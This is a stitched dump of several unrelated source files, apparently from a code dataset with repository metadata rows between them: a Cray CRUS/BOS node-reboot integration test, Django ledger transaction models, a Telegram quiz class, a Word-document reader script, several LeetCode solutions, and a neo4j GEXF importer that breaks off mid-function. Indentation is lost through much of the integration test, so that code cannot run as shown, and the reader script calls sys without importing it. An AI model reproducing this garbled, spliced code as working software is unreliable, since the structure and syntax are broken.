from crus_integration_test.crus import verify_crus_waiting_for_quiesce
from crus_integration_test.hsm import create_hsm_groups
from crus_integration_test.slurm import complete_slurm_job, start_slurm_job, \
verify_initial_slurm_state
from crus_integration_test.utils import bos_reboot_nodes, create_bos_session_templates, \
monitor_crus_session, \
verify_results_of_crus_session
from common.bos import bos_session_template_validate_cfs, \
list_bos_session_templates, list_bos_sessions
from common.bosutils import delete_bos_session_templates, \
delete_cfs_configs, \
delete_hsm_groups, \
delete_vcs_repo_and_org
from common.cfs import describe_cfs_config
from common.crus import create_crus_session, delete_crus_session
from common.helpers import CMSTestError, create_tmpdir, debug, error_exit, exit_test, \
init_logger, info, log_exception_error, raise_test_exception_error, \
remove_tmpdir, section, subtest, warn
from common.hsm import set_hsm_group_members
from common.k8s import get_csm_private_key
from common.utils import get_compute_nids_xnames, validate_node_hostnames
from common.vcs import create_and_clone_vcs_repo
import random
import sys
TEST_NAME = "crus_integration_test"
def do_subtest(subtest_name, subtest_func, **subtest_kwargs):
    """
    Announce the named subtest, then invoke *subtest_func* with the given
    keyword arguments and return its result. CMSTestError propagates
    unchanged; any other exception is converted through
    raise_test_exception_error().
    """
    subtest(subtest_name)
    try:
        return subtest_func(**subtest_kwargs)
    except CMSTestError:
        # Already a test-framework error -- let it bubble up as-is.
        raise
    except Exception as exc:
        raise_test_exception_error(exc, "%s subtest" % subtest_name)
def do_test(test_variables):
"""
Main test body. Execute each subtest in turn.
"""
# =============================
# =============================
# SETUP
# =============================
# =============================
use_api = test_variables["use_api"]
if use_api:
info("Using API")
else:
info("Using CLI")
# We don't need the CSM private key until it comes time to ssh into the compute nodes, but we'd
# rather know up front if this fails, to save time
do_subtest("Get CSM private key (for later use to ssh to computes)", get_csm_private_key)
nid_to_xname, xname_to_nid = do_subtest("Find compute nids & xnames",
get_compute_nids_xnames, use_api=use_api,
nids=test_variables["nids"],
groups=test_variables["groups"],
xnames=test_variables["xnames"],
min_required=3)
test_variables["nids"] = sorted(list(nid_to_xname.keys()))
test_variables["xnames"] = sorted(list(nid_to_xname.values()))
nids = test_variables["nids"]
xnames = test_variables["xnames"]
info("nids: %s" % str(nids))
slurm_nid = random.choice(nids)
slurm_xname = nid_to_xname[slurm_nid]
test_nids = [ n for n in nids if n != slurm_nid ]
test_xnames = [ x for x in xnames if x != slurm_xname ]
debug("Slurm controller: nid %d (xname %s)" % (slurm_nid, slurm_xname))
debug("Worker nodes:")
for test_nid in sorted(test_nids):
debug(" nid %d (xname %s)" % (test_nid, nid_to_xname[test_nid]))
max_step_size = len(nids)
if test_variables["max_step_size"]:
max_step_size = min(max_step_size, test_variables["max_step_size"])
do_subtest("Validate node hostnames", validate_node_hostnames, nid_to_xname=nid_to_xname)
template_objects = do_subtest("List all BOS session templates", list_bos_session_templates,
use_api=use_api)
info("BOS session template: %s" % test_variables["template"])
if test_variables["template"] not in template_objects:
error_exit("No BOS session template found with name %s" % test_variables["template"])
else:
slurm_template_name = test_variables["template"]
cfs_config_name = do_subtest("Get CFS configuration name from %s BOS session template" % slurm_template_name,
bos_session_template_validate_cfs, bst=template_objects[slurm_template_name])
info("CFS configuration name in %s is %s" % (slurm_template_name, cfs_config_name))
test_variables["base_cfs_config_name"] = cfs_config_name
do_subtest("Validate CFS configuration %s" % cfs_config_name,
describe_cfs_config, use_api=use_api, name=cfs_config_name)
test_hsm_groups = test_variables["test_hsm_groups"]
do_subtest("Create hsm groups", create_hsm_groups, use_api=use_api, test_hsm_groups=test_hsm_groups)
tmpdir = do_subtest("Create temporary directory", create_tmpdir)
test_variables["tmpdir"] = tmpdir
# Always want to make sure that we have a template which does not match any of the others
# for both cfs branch and kernel parameters.
num_test_templates = 3
test_vcs_org = "crus-integration-test-org-%d" % random.randint(0,9999999)
test_vcs_repo = "crus-integration-test-repo-%d" % random.randint(0,9999999)
test_variables["test_vcs_org"] = test_vcs_org
test_variables["test_vcs_repo"] = test_vcs_repo
vcs_repo_dir = do_subtest("Create and clone VCS repo %s in org %s" % (test_vcs_repo, test_vcs_org),
create_and_clone_vcs_repo, orgname=test_vcs_org, reponame=test_vcs_repo,
testname=TEST_NAME, tmpdir=tmpdir)
test_variables["vcs_repo_dir"] = vcs_repo_dir
do_subtest("Create modified BOS session templates",
create_bos_session_templates,
num_to_create=num_test_templates,
use_api=use_api,
template_objects=template_objects,
test_variables=test_variables,
xname_to_nid=xname_to_nid)
test_template_names = test_variables["test_template_names"]
base_test_template, test_template1, test_template2 = test_template_names
debug("Base test template: %s" % base_test_template)
debug("Test template 1: %s" % test_template1)
debug("Test template 2: %s" % test_template2)
# Use BOS to reboot all target nodes to new BOS session template
xname_template_map = dict()
do_subtest("Reboot all target nodes to %s template" % base_test_template, bos_reboot_nodes,
template_name=base_test_template, use_api=use_api, template_objects=template_objects,
xname_to_nid=xname_to_nid, xname_template_map=xname_template_map)
# Verify slurm reports all test nodes as ready
do_subtest("Verify slurm reports test nodes as ready", verify_initial_slurm_state,
use_api=use_api, slurm_control_xname=slurm_xname, worker_xnames=test_xnames,
xname_to_nid=xname_to_nid)
crus_session_hsm_groups = {
"failed_label": test_hsm_groups["failed"],
"starting_label": test_hsm_groups["starting"],
"upgrading_label": test_hsm_groups["upgrading"] }
    def _set_starting_group(target_xnames):
        """
        Wrapper to call common.hsm.set_hsm_group_members to set our starting
        group's member list to equal the specified xnames

        target_xnames: list of node xnames that should become the group's
        entire membership. Reads crus_session_hsm_groups and use_api from
        the enclosing scope.
        """
        group_name = crus_session_hsm_groups["starting_label"]
        node_text = ", ".join(sorted(target_xnames))
        # For more than 5 nodes, log the full membership separately and keep
        # the subtest title short so the report line stays readable.
        if len(target_xnames) > 5:
            info("Setting HSM group %s member list to: %s" % (group_name, node_text))
            subtest_text = "Setting HSM group %s member list to %d test nodes" % (group_name, len(target_xnames))
        else:
            subtest_text = "Setting HSM group %s member list to: %s" % (group_name, node_text)
        do_subtest(subtest_text, set_hsm_group_members, use_api=use_api, group_name=group_name, xname_list=target_xnames)
    def _create_crus_session(target_xnames, step_size, template_name):
        """
        First, makes a list of all current BOS sessions.
        Then creates a CRUS session with the specified values.
        The target_xnames list is just used for test logging purposes, to
        describe the CRUS session.
        Returns the session_id of the CRUS session, a
        dictionary of the CRUS session values, and the collected
        BOS session list.
        """
        # Snapshot the BOS session list first so later verification can tell
        # which BOS sessions were created by this CRUS session.
        bos_sessions = do_subtest("Getting list of BOS sessions before CRUS session is running",
                                  list_bos_sessions, use_api=use_api)
        info("BOS session list: %s" % ", ".join(bos_sessions))
        node_text = ", ".join(sorted(target_xnames))
        # As in _set_starting_group, abbreviate long node lists in the title.
        if len(target_xnames) > 5:
            info("Creating CRUS session with target nodes: %s" % node_text)
            node_text = "%d test nodes" % len(target_xnames)
        subtest_text = "Create CRUS session (template: %s, step size: %d, nodes: %s)" % (template_name, step_size, node_text)
        # crus_session_values doubles as both the create arguments and the
        # expected values that _wait_verify_delete_crus_session checks later.
        crus_session_values = {
            "use_api": use_api,
            "upgrade_step_size": step_size,
            "upgrade_template_id": template_name }
        crus_session_values.update(crus_session_hsm_groups)
        response_object = do_subtest(subtest_text, create_crus_session, **crus_session_values)
        crus_session_id = response_object["upgrade_id"]
        return crus_session_id, crus_session_values, bos_sessions
    def _wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions):
        """
        Wait for CRUS session to be complete.
        Update the xname_template_map to reflect the new expected template for the nodes in the session.
        Verify that the CRUS session results look okay.
        Delete the CRUS session.

        Mutates the enclosing-scope xname_template_map in place so the next
        verification round knows which template each node should be booted to.
        """
        do_subtest("Wait for CRUS session %s to complete" % crus_session_id, monitor_crus_session,
                   use_api=use_api, upgrade_id=crus_session_id, expected_values=crus_session_values,
                   bos_sessions=bos_sessions)
        # Set new expected template for target xnames
        for xn in target_xnames:
            xname_template_map[xn] = crus_session_values["upgrade_template_id"]
        do_subtest("Verify results of CRUS session %s" % crus_session_id, verify_results_of_crus_session,
                   use_api=use_api, xname_template_map=xname_template_map, template_objects=template_objects,
                   xname_to_nid=xname_to_nid, target_xnames=list(target_xnames), **crus_session_hsm_groups)
        do_subtest("Delete CRUS session %s" % crus_session_id, delete_crus_session,
                   use_api=use_api, upgrade_id=crus_session_id, max_wait_for_completion_seconds=300)
# =============================
# =============================
# TEST 1
# =============================
# =============================
# Randomly pick 1 xname
xn = random.choice(test_xnames)
target_xnames = [xn]
# Put it into starting HSM group
_set_starting_group(target_xnames)
# Pick random step size (since we're only dealing with 1 node, it doesn't matter)
ssize = random.randint(1, 10000)
# Create CRUS session
crus_session_id, crus_session_values, bos_sessions = _create_crus_session(target_xnames, ssize, test_template1)
# Wait for it to finish, make sure everything looks good, and delete it
_wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions)
# =============================
# =============================
# TEST 2
# =============================
# =============================
# Set starting group to all test nodes
target_xnames = test_xnames
_set_starting_group(target_xnames)
# Set step size such that we get at least 2 steps
ssize = len(target_xnames) // 2
if (len(target_xnames) % 2) != 0:
ssize += 1
ssize = min(ssize, max_step_size)
# Create CRUS session
crus_session_id, crus_session_values, bos_sessions = _create_crus_session(target_xnames, ssize, test_template2)
# Wait for it to finish, make sure everything looks good, and delete it
_wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions)
# =============================
# =============================
# TEST 3
# =============================
# =============================
# Randomly select a node for the starting group
xn = random.choice(test_xnames)
target_xnames = [xn]
_set_starting_group(target_xnames)
# Pick random step size (since we're only dealing with 1 node, it doesn't matter)
ssize = random.randint(1, 10000)
# Start slurm workload on node
slurm_job_id, slurm_job_stopfile = do_subtest("Start slurm workload on %s" % xn, start_slurm_job,
slurm_control_xname=slurm_xname, worker_xname=xn, xname_to_nid=xname_to_nid, tmpdir=tmpdir)
# Create CRUS session
crus_session_id, crus_session_values, bos_sessions = _create_crus_session([xn], ssize, test_template1)
# Verify that CRUS session is waiting for nodes to quiesce
do_subtest("Verify CRUS session %s is waiting for nodes to quiesce" % crus_session_id,
verify_crus_waiting_for_quiesce, use_api=use_api, crus_session_id=crus_session_id,
expected_values=crus_session_values)
# Stop slurm workload on node
do_subtest("Stop slurm workload on %s" % xn, complete_slurm_job,
slurm_control_xname=slurm_xname, worker_xname=xn,
stopfile_name=slurm_job_stopfile, slurm_job_id=slurm_job_id)
# Wait for CRUS session to finish, make sure everything looks good, and delete it
_wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions)
# =============================
# =============================
# RESTORE NODES
# =============================
# =============================
# Set starting group to all test nodes plus the node we've been using for slurm
target_xnames = xnames
_set_starting_group(target_xnames)
# Create CRUS session
crus_session_id, crus_session_values, bos_sessions = _create_crus_session(target_xnames, ssize, base_test_template)
# Wait for it to finish, make sure everything looks good, and delete it
_wait_verify_delete_crus_session(crus_session_id, crus_session_values, target_xnames, bos_sessions)
# =============================
# =============================
# CLEANUP
# =============================
# =============================
section("Cleaning up")
do_subtest("Delete modified BOS session templates", delete_bos_session_templates, use_api=use_api,
template_names=test_template_names)
do_subtest("Delete VCS repo and org", delete_vcs_repo_and_org, test_variables=test_variables)
do_subtest("Delete CFS configurations", delete_cfs_configs, use_api=use_api, cfs_config_names=test_variables["test_cfs_config_names"])
do_subtest("Delete hsm groups", delete_hsm_groups, use_api=use_api, group_map=test_hsm_groups)
do_subtest("Remove temporary directory", remove_tmpdir, tmpdir=tmpdir)
test_variables["tmpdir"] = None
section("Test passed")
def test_wrapper():
    """Parse args, run do_test, and attempt best-effort cleanup on failure."""
    # Mutable dict shared with do_test; do_test fills these in as the test
    # creates resources, so the except branch below can clean them up.
    test_variables = {
        "test_template_names": list(),
        "test_cfs_config_names": list(),
        "test_hsm_groups": dict(),
        "tmpdir": None,
        "test_vcs_org": None,
        "test_vcs_repo": None,
        "vcs_repo_dir": None }
    parse_args(test_variables)
    init_logger(test_name=TEST_NAME, verbose=test_variables["verbose"])
    info("Starting test")
    debug("Arguments: %s" % sys.argv[1:])
    debug("test_variables: %s" % str(test_variables))
    use_api = test_variables["use_api"]
    try:
        do_test(test_variables=test_variables)
    except Exception as e:
        # Adding this here to do cleanup when unexpected errors are hit (and to log those errors)
        msg = log_exception_error(e)
        section("Attempting cleanup before exiting in failure")
        # NOTE(review): the KeyError guards below look redundant since every
        # key is pre-seeded above -- presumably defensive in case do_test
        # replaces the dict contents; confirm before simplifying.
        try:
            test_template_names = test_variables["test_template_names"]
        except KeyError:
            test_template_names = None
        try:
            test_cfs_config_names = test_variables["test_cfs_config_names"]
        except KeyError:
            test_cfs_config_names = None
        try:
            test_hsm_groups = test_variables["test_hsm_groups"]
        except KeyError:
            test_hsm_groups = None
        try:
            tmpdir = test_variables["tmpdir"]
        except KeyError:
            tmpdir = None
        if test_template_names:
            info("Attempting to clean up test BOS session templates before exiting")
            delete_bos_session_templates(use_api=use_api, template_names=test_template_names, error_cleanup=True)
        if test_cfs_config_names:
            delete_cfs_configs(use_api=use_api, cfs_config_names=test_cfs_config_names, error_cleanup=True)
        delete_vcs_repo_and_org(test_variables=test_variables, error_cleanup=True)
        if test_hsm_groups:
            info("Attempting to clean up test HSM groups before exiting")
            delete_hsm_groups(use_api=use_api, group_map=test_hsm_groups, error_cleanup=True)
        if tmpdir != None:
            remove_tmpdir(tmpdir)
        section("Cleanup complete")
        error_exit(msg)
if __name__ == '__main__':
test_wrapper()
exit_test() | 45.226966 | 138 | 0.673507 |
3a80351f1ae9d22c12f2dfa0609670916e8b44d0 | 3,071 | py | Python | backend/transaction/models.py | elielagmay/react-budgeteer | 49a25dbd6dd6ea5d8bc93421eefbc12808f585af | [
"Unlicense"
] | 2 | 2018-10-23T00:40:53.000Z | 2021-05-31T08:19:40.000Z | backend/transaction/models.py | elielagmay/react-budgeteer | 49a25dbd6dd6ea5d8bc93421eefbc12808f585af | [
"Unlicense"
] | null | null | null | backend/transaction/models.py | elielagmay/react-budgeteer | 49a25dbd6dd6ea5d8bc93421eefbc12808f585af | [
"Unlicense"
] | null | null | null | from decimal import Decimal
from django.core.exceptions import ValidationError
from django.db import models
from app.utils import get_balances
class Transaction(models.Model):
    """A dated transaction in a ledger, composed of one or more entries."""

    ledger = models.ForeignKey(
        'ledger.Ledger',
        on_delete=models.PROTECT,
        related_name='transactions'
    )
    date = models.DateTimeField()
    payee = models.CharField(max_length=255)
    description = models.TextField(blank=True)

    class Meta:
        get_latest_by = 'date'
        ordering = ('-date', )

    def __str__(self):
        suffix = ' - {}'.format(self.description) if self.description else ''
        return '{} - {}{}'.format(
            self.date.strftime('%d %b %Y'), self.payee, suffix)

    def is_balanced(self):
        """True when the converted per-commodity balances all sum to zero."""
        balances = get_balances(self.entries.all(), convert=True)
        return all(balance['amount'] == 0 for balance in balances)
    # Admin list display: render as a boolean icon.
    is_balanced.boolean = True

    def is_cleared(self):
        """True when no entry of this transaction is still uncleared."""
        return not self.entries.filter(is_cleared=False).exists()
    # Admin list display: render as a boolean icon.
    is_cleared.boolean = True
class Entry(models.Model):
    """A single line (debit/credit) of a Transaction, in one commodity."""
    transaction = models.ForeignKey(
        'transaction.Transaction',
        on_delete=models.CASCADE,
        related_name='entries'
    )
    account = models.ForeignKey(
        'account.Account',
        on_delete=models.PROTECT,
        related_name='entries'
    )
    commodity = models.ForeignKey(
        'commodity.Commodity',
        on_delete=models.PROTECT,
        related_name='entries'
    )
    # Optional conversion rate from this entry's commodity to another one.
    price = models.ForeignKey(
        'commodity.Price',
        on_delete=models.PROTECT,
        related_name='entries',
        null=True,
        blank=True
    )
    amount = models.DecimalField(max_digits=32, decimal_places=8)
    description = models.TextField(blank=True)
    is_cleared = models.BooleanField(default=True)
    class Meta:
        verbose_name_plural = 'entries'
    def __str__(self):
        return u'Entry ID:{}'.format(self.id)
    def clean(self):
        """Validate that account, commodity and price belong to the same
        ledger as the parent transaction, and that the price (if any)
        matches this entry's commodity.

        Raises ValidationError with a per-field error dict.
        """
        errors = {}
        ledger = self.transaction.ledger
        if ledger != self.account.category.ledger:
            errors['account'] = 'Selected account is invalid'
        if ledger != self.commodity.ledger:
            errors['commodity'] = 'Selected commodity is invalid'
        if self.price is not None and ledger != self.price.primary.ledger:
            errors['price'] = 'Selected price is invalid'
        # NOTE(review): both price checks write the same 'price' key, so if
        # both fail only this second message is reported.
        if self.price is not None and self.price.primary != self.commodity:
            errors['price'] = 'Selected price must match commodity'
        if errors:
            raise ValidationError(errors)
    def get_amount_tuple(self, convert=False):
        """Return (quantized amount, commodity) for this entry.

        With convert=True and a price set, the amount is converted into the
        price's secondary commodity before quantizing.

        Raises ValueError if the stored amount is not a finite Decimal.
        """
        # str() round-trip presumably normalizes non-Decimal inputs (e.g.
        # float) into Decimal -- TODO confirm against callers.
        amount = Decimal(str(self.amount))
        commodity = self.commodity
        if not amount.is_finite():
            raise ValueError('amount is not a finite number')
        if convert and self.price is not None:
            commodity = self.price.secondary
            amount *= self.price.amount
        return (commodity.get_quantized_amount(amount), commodity)
| 29.528846 | 75 | 0.626506 |
3a804a776b085e92ef90bbf2391ea52e871ea437 | 2,335 | py | Python | src/games/textquiz.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | src/games/textquiz.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | src/games/textquiz.py | aleksandrgordienko/melissa-quiz | 49b165acc9aae0ad84cf751cbeb4f6a27dd5ab0f | [
"MIT"
] | null | null | null | # python-telegram-quiz
# @author: Aleksandr Gordienko
# @site: https://github.com/aleksandrgordienko/melissa-quiz
from random import randint
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Question(Base):
    """SQLAlchemy model for a single quiz question row."""
    __tablename__ = 'questions'
    # Primary key; also used by TextQuiz as the key of its in-memory dict.
    id = Column(Integer, primary_key=True)
    question = Column(String(1000))
    answer = Column(String(100))
    # Number of times this question has been asked.
    ask_count = Column(Integer)
class TextQuiz:
    """Text quiz game backed by a SQLAlchemy session of Question rows."""

    def __init__(self, session):
        """Load every question into memory.

        self.questions maps question id -> dict with 'question', 'answer'
        and 'ask_count' keys.
        """
        self.questions = {}
        self.name = 'textquiz'
        self.session = session
        for question in self.session.query(Question).all():
            self.questions[question.id] = {'question': question.question,
                                           'answer': question.answer,
                                           'ask_count': question.ask_count}

    def nextq(self):
        """Pick a random question and return (question_id, initial_hint_mask).

        Also increments and persists the question's ask_count.
        """
        # BUGFIX: pick among the ids actually loaded from the database.
        # The previous randint(0, len(self.questions)) could yield 0 or
        # len(...), neither of which is guaranteed to be a key (DB ids
        # start at 1 and may have gaps), raising KeyError.
        ids = list(self.questions)
        question_id = ids[randint(0, len(ids) - 1)]
        question = self.questions[question_id]
        question['ask_count'] += 1
        self.session.merge(Question(id=question_id,
                                    ask_count=question['ask_count']))
        self.session.commit()
        return question_id, self.get_initial_hint_mask(question_id)

    def get_question(self, question_id):
        """Return the question text for the given id."""
        return self.questions[question_id]['question']

    def get_answer(self, question_id):
        """Return the answer text for the given id."""
        return self.questions[question_id]['answer']

    def answer_is_correct(self, question_id, answer):
        """Case-insensitive check; any substring of the answer is accepted."""
        return answer.lower() in self.get_answer(question_id).lower()

    def get_hint_text(self, question_id, hint_symbol, hint_separator, hint_mask):
        """Render the answer with unrevealed characters as hint_symbol.

        hint_mask is a list of booleans (True = reveal the character) or a
        falsy value meaning "nothing revealed yet". In the masked branch a
        separator is appended after every character.
        """
        out_text = ''
        answer = self.get_answer(question_id)
        if hint_mask:
            for i, c in enumerate(answer):
                if hint_mask[i]:
                    out_text += c
                else:
                    out_text += hint_symbol
                out_text += hint_separator
        else:
            out_text = (hint_symbol + hint_separator) * len(answer)
        return out_text

    def get_initial_hint_mask(self, question_id):
        """Return an all-hidden mask (one False per answer character)."""
        return [False] * len(self.get_answer(question_id))
| 33.357143 | 81 | 0.621842 |
3a818c77d8d52a71bd103be2681594c2e4e919a8 | 1,246 | py | Python | Automate the Boring Stuff with Python/readDocx.py | m-barnes/Python | 0940d5f9b832c28703a32691db287b1361ce6ecc | [
"MIT"
] | null | null | null | Automate the Boring Stuff with Python/readDocx.py | m-barnes/Python | 0940d5f9b832c28703a32691db287b1361ce6ecc | [
"MIT"
] | null | null | null | Automate the Boring Stuff with Python/readDocx.py | m-barnes/Python | 0940d5f9b832c28703a32691db287b1361ce6ecc | [
"MIT"
] | null | null | null | import docx
import time
import os
from os import system
from pprint import pprint
finished = False
def getText(filename):
    """Print and pretty-print all paragraph texts of a Word document.

    filename: path to a .docx file readable by python-docx.
    Returns the list of paragraph strings so callers can reuse it
    (previously the list was built and then discarded).
    """
    print(filename)
    doc = docx.Document(filename)
    # One string per paragraph, in document order.
    fullText = [para.text for para in doc.paragraphs]
    pprint(fullText)
    return fullText
def clear():
    """Clear the terminal on both Windows ('cls') and POSIX ('clear').

    os.system() signals failure through its return code rather than by
    raising, so the original try/except fallback never triggered on
    POSIX -- 'cls' simply failed and the screen was never cleared.
    Dispatch on the platform instead.
    """
    system('cls' if os.name == 'nt' else 'clear')
# Interactive main loop.  NOTE(review): 'finished' is never set to True, so
# the loop relies on sys.exit()/exceptions to terminate; also note parseFile
# calls itself recursively on every retry, which can eventually exhaust the
# recursion limit in a long session.
while finished == False:
    def parseFile():
        """Prompt for a directory and a .docx filename, then parse it."""
        print('The current working directory is ', os.getcwd())
        path = input('\nPlease provide the full path to the Word document you wish to parse or press \'enter\' to keep the current directory.\n')
        if len(path)==0:
            path = os.getcwd()
        try:
            os.path.abspath(path)
            os.chdir(path)
        except:
            print('Cannot find that directory.  Please wait...')
            time.sleep(2)
            clear()
            parseFile()
        try:
            filename = input('\nPlease provide the name of the Word document. ')
            getText(filename + '.docx')
            continueParse = input('\n\n\nWould you like to parse another file? (y)es or (n)o? ').lower()
            if continueParse == 'y':
                parseFile()
            else:
                print('Goodbye!')
                time.sleep(2)
                # BUG: 'sys' is never imported in this file, so this raises
                # NameError (which the bare except below then swallows,
                # restarting the prompt instead of exiting).
                sys.exit()
        except:
            print('Cannot find that file.  Please try again.  Please wait...')
            time.sleep(2)
            clear()
            parseFile()
    parseFile()
| 20.766667 | 139 | 0.652488 |
3a83a000f0a9ae9cf8e818fa8a8f6b2e52f61077 | 2,014 | py | Python | Leetcode/Python/_1207.py | Xrenya/algorithms | aded82cacde2f4f2114241907861251e0e2e5638 | [
"MIT"
] | 1 | 2021-11-28T15:03:32.000Z | 2021-11-28T15:03:32.000Z | Leetcode/Python/_1207.py | Xrenya/algorithms | aded82cacde2f4f2114241907861251e0e2e5638 | [
"MIT"
] | null | null | null | Leetcode/Python/_1207.py | Xrenya/algorithms | aded82cacde2f4f2114241907861251e0e2e5638 | [
"MIT"
] | null | null | null | class Solution:
def uniqueOccurrences(self, arr: List[int]) -> bool:
hashMap = {}
for num in arr:
if num not in hashMap:
hashMap[num] = 1
else:
hashMap[num] += 1
array = hashMap.values()
unique = {}
for num in array:
if num not in unique:
unique[num] = 1
else:
return False
return True
class Solution:
    def uniqueOccurrences(self, arr: List[int]) -> bool:
        """Check whether all value frequencies in arr are pairwise distinct."""
        frequencies = {}
        for value in arr:
            frequencies[value] = frequencies.get(value, 0) + 1
        seen_counts = set()
        for count in frequencies.values():
            if count in seen_counts:
                return False
            seen_counts.add(count)
        return True
class Solution:
    def uniqueOccurrences(self, arr: List[int]) -> bool:
        """True iff no two values in arr share the same occurrence count."""
        tally = {}
        for item in arr:
            tally[item] = tally.get(item, 0) + 1
        distinct_counts = set(tally.values())
        return len(tally) == len(distinct_counts)
class Solution:
    def uniqueOccurrences(self, arr: List[int]) -> bool:
        """True when each distinct value occurs a unique number of times."""
        occurrences = {}
        for element in arr:
            if element in occurrences:
                occurrences[element] += 1
            else:
                occurrences[element] = 1
        counts = list(occurrences.values())
        return len(counts) == len(set(counts))
class Solution:
    def uniqueOccurrences(self, arr: List[int]) -> bool:
        """Return True iff all occurrence counts in arr are distinct.

        The original drained a list with `array.pop()` plus an `in`
        membership scan per element, which is O(n^2); comparing the count
        list against its set does the same duplicate check in O(n).
        """
        freq = {}
        for num in arr:
            freq[num] = freq.get(num, 0) + 1
        counts = list(freq.values())
        return len(counts) == len(set(counts))
| 27.589041 | 57 | 0.456802 |
3a84202d32e5e1c571adc31fc572e8596c4a5a08 | 87 | py | Python | rura/pipeline/__init__.py | fdabek1/rura | 6779733149d7e4181be54ecb72fbd4de6d71c678 | [
"MIT"
] | null | null | null | rura/pipeline/__init__.py | fdabek1/rura | 6779733149d7e4181be54ecb72fbd4de6d71c678 | [
"MIT"
] | null | null | null | rura/pipeline/__init__.py | fdabek1/rura | 6779733149d7e4181be54ecb72fbd4de6d71c678 | [
"MIT"
] | null | null | null | from .dataset import Dataset
from .model import Model
from .transform import Transform
| 21.75 | 32 | 0.827586 |
3a8504e3359b503e6fccca39bd8d8317686a767b | 5,707 | py | Python | originalCode_JMG/data/dataimportallIN.py | dataforgoodfr/batch9_validalab | f333bea8203fd1e4ed098b6e2d51a7f7b05ae530 | [
"MIT"
] | null | null | null | originalCode_JMG/data/dataimportallIN.py | dataforgoodfr/batch9_validalab | f333bea8203fd1e4ed098b6e2d51a7f7b05ae530 | [
"MIT"
] | null | null | null | originalCode_JMG/data/dataimportallIN.py | dataforgoodfr/batch9_validalab | f333bea8203fd1e4ed098b6e2d51a7f7b05ae530 | [
"MIT"
] | 1 | 2021-04-19T21:27:58.000Z | 2021-04-19T21:27:58.000Z | import networkx as nx
from py2neo import Graph, Node, Relationship
import pandas as pd
import random
graph = Graph("bolt://localhost:7687", auth=("neo4j", "Password"))
def importGexf(gexffilepath, depth = 0):
    '''
    Reads gexf network file from hyphe, update or create all nodes and relationships in neo4j database
    Print . for each 100 nodes/links imported, 1000 for each 1000
    "depth" is used to prefix new properties on node and rel. Value can be 0, 1 or 2

    Uses the module-level py2neo `graph` connection. Node properties are
    stored prefixed with "D<depth>_" so imports at different crawl depths
    do not overwrite each other.
    '''
    # imports or update all nodes / relationships in gexf file from hyphe
    G= nx.read_gexf(gexffilepath, node_type=None, relabel=False, version='1.1draft')
    data = nx.json_graph.node_link_data(G)
    totnbnodes=len(data['nodes'])
    print(totnbnodes," nodes found in gexf")
    # NOTE(review): i starts at 1 and is incremented before any work, so the
    # final "nodes imported" message overstates the count by one.
    i=1
    for node in data['nodes']:
        i=i+1
        # Match an existing Website node by label, else create it.
        nodematch = graph.nodes.match(site_name =node['label']).first()
        if nodematch == None:
            try:
                nodematch = Node('Website', site_name = node['label'])
                nodematch.__primarylabel__ = 'Website'
                nodematch.__primarykey__ = 'site_name'
                graph.merge(nodematch)
            except:
                print("could not import ", node['label'])
        # Copy every gexf attribute onto the node, prefixed with the depth.
        for key in node.keys():
            nodematch["D" + str(depth) + "_" + key] = node[key]
        graph.push(nodematch)
        if i%100 == 0:
            print(".", end=" ")
        if i%1000 ==0:
            print(i,"/",totnbnodes)
    print(i," nodes imported")
    print(len(graph.nodes.match("Website")), "nodes in db after import")
    totnblinks=len(data['links'])
    print(totnblinks," links found in gexf")
    j=0
    for link in data['links']:
        # Resolve source/target by the depth-specific id property.
        if depth ==0:
            source_n = graph.nodes.match("Website", D0_id = link['source']).first()
            target_n = graph.nodes.match("Website", D0_id = link['target']).first()
        if depth == 1:
            source_n = graph.nodes.match("Website", D1_id = link['source']).first()
            target_n = graph.nodes.match("Website", D1_id = link['target']).first()
        if depth == 2:
            source_n = graph.nodes.match("Website", D2_id = link['source']).first()
            target_n = graph.nodes.match("Website", D2_id = link['target']).first()
        if depth == 3:
            source_n = graph.nodes.match("Website", D3_id = link['source']).first()
            target_n = graph.nodes.match("Website", D3_id = link['target']).first()
        relmatch = graph.relationships.match((source_n,target_n),r_type="LINKS_TO").first()
        try:
            if relmatch == None:
                rel = Relationship(source_n, "LINKS_TO", target_n)
                rel["count_D" + str(depth)]=link['count']
                graph.merge(rel)
            else:
                relmatch["count_D" + str(depth)]=link['count']
                graph.push(relmatch)
            if j%100 == 0:
                print(".", end=" ")
            if j%1000 ==0:
                print(j, "/", totnblinks)
            j=j+1
        # NOTE(review): bare except silently drops any link that fails to
        # import (e.g. when source/target was not matched above).
        except:
            pass
    print(j," links imported")
    print(len(graph.relationships.match()), "links in db after import")
def importGexfLinks(gexffilepath, depth = 0):
    '''
    Reads gexf network file from hyphe, update or create relationships in neo4j database
    Print . for each 100 links imported, 1000 for each 1000
    "depth" is used to prefix new properties on rel. Value can be 0, 1 or 2

    Same as the link-import half of importGexf: nodes must already exist
    with a "D<depth>_id" property for source/target resolution to succeed.
    '''
    G= nx.read_gexf(gexffilepath, node_type=None, relabel=False, version='1.1draft')
    data = nx.json_graph.node_link_data(G)
    totnblinks=len(data['links'])
    print(totnblinks," links found in gexf")
    # NOTE(review): j starts at 1 here (importGexf starts at 0), so the two
    # functions report progress counts inconsistently.
    j=1
    for link in data['links']:
        # Resolve source/target by the depth-specific id property.
        if depth ==0:
            source_n = graph.nodes.match("Website", D0_id = link['source']).first()
            target_n = graph.nodes.match("Website", D0_id = link['target']).first()
        if depth == 1:
            source_n = graph.nodes.match("Website", D1_id = link['source']).first()
            target_n = graph.nodes.match("Website", D1_id = link['target']).first()
        if depth == 2:
            source_n = graph.nodes.match("Website", D2_id = link['source']).first()
            target_n = graph.nodes.match("Website", D2_id = link['target']).first()
        if depth == 3:
            source_n = graph.nodes.match("Website", D3_id = link['source']).first()
            target_n = graph.nodes.match("Website", D3_id = link['target']).first()
        relmatch = graph.relationships.match((source_n,target_n),r_type="LINKS_TO").first()
        try:
            if relmatch == None:
                rel = Relationship(source_n, "LINKS_TO", target_n)
                rel["count_D" + str(depth)]=link['count']
